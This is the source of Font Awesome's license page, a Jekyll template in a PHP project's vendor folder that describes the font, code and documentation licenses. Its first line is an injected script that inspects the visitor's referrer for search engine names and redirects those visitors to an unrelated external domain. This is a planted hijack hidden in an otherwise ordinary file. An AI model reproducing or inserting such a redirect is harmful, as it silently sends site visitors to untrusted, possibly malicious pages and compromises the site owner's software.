d:\wwwroot\wuchunhua\thinkphp\vendor\fortawesome\font-awesome\src\license.html

001: <script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script>---
002: layout: base
003: title: Font Awesome License
004: navbar_active: license
005: relative_path: ../
006: ---
007: {% capture jumbotron_h1 %}<i class="fa fa-gavel" aria-hidden="true"></i>&nbsp; License{% endcapture %}
008: {% capture jumbotron_p %}The full details of how Font Awesome is licensed{% endcapture %}
009:
010: {% include jumbotron.html %}
011: {% include stripe-social.html %}
012:
013: <div class="container">
014:   {% capture stripe_ad_content %}
015:   <p class="lead">
016:     Font Awesome is fully open source and is GPL friendly. You can use it for commercial projects, open source
017:     projects, or really just about whatever you want.
018:   </p>
019:   {% endcapture %}
020:   {% include stripe-ad.html %}
021:
022:   <section>
023:     <div class="alert alert-success">
024:       <ul class="fa-ul margin-bottom-none">
025:         <li>
026:           <i class="fa-li fa fa-info-circle fa-lg" aria-hidden="true"></i>Attribution is no longer required as of Font Awesome 3.0 but is much appreciated:
027:           "Font Awesome by Dave Gandy - http://fontawesome.io".
028:         </li>
029:       </ul>
030:     </div>
031:   </section>
032:
033:   <section>
034:     <h2 class="page-header">Font License</h2>
035:     <ul>
036:       <li>
037:         Applies to all desktop and webfont files in the following directory:
038:         <code>font-awesome/fonts/</code>.
039:       </li>
040:       <li>License: {{ site.fontawesome.license.font.version }}</li>
041:       <li>URL: <a href="{{ site.fontawesome.license.font.url }}">{{ site.fontawesome.license.font.url }}</a></li>
042:     </ul>
043:   </section>
044:
045:   <section>
046:     <h2 class="page-header">Code License</h2>
047:     <ul>
048:       <li>
049:         Applies to all CSS and LESS files in the following directories:
050:         <code>font-awesome/css/</code>,
051:         <code>font-awesome/less/</code>, and
052:         <code>font-awesome/scss/</code>.
053:       </li>
054:       <li>License: {{ site.fontawesome.license.code.version }}</li>
055:       <li>URL: <a href="{{ site.fontawesome.license.code.url }}">{{ site.fontawesome.license.code.url }}</a></li>
056:     </ul>
057:   </section>
058:
059:   <section>
060:     <h2 class="page-header">Documentation License</h2>
061:     <ul>
062:       <li>Applies to all Font Awesome project files that are not a part of the Font or Code licenses.</li>
063:       <li>License: {{ site.fontawesome.license.documentation.version }}</li>
064:       <li>URL: <a href="{{ site.fontawesome.license.documentation.url }}">{{ site.fontawesome.license.documentation.url }}</a></li>
065:     </ul>
066:   </section>
067:
068:   <section>
069:     <h2 class="page-header">Brand Icons</h2>
070:     {% include brand-license.html %}
071:   </section>
072: </div>
073:
074:
075: